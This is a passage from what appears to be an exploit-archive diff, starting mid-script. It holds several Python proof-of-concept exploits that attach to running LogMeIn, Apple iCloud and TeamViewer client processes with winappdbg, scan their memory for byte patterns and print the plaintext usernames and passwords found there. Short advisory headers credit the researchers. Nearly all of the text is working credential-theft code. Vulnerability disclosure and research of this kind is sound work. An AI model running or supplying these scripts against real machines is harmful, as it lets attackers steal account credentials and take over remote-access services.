password = tmp_passwd.split('&is_sso_link=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()

74
platforms/windows/local/40342.py Executable file
View file

@ -0,0 +1,74 @@
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()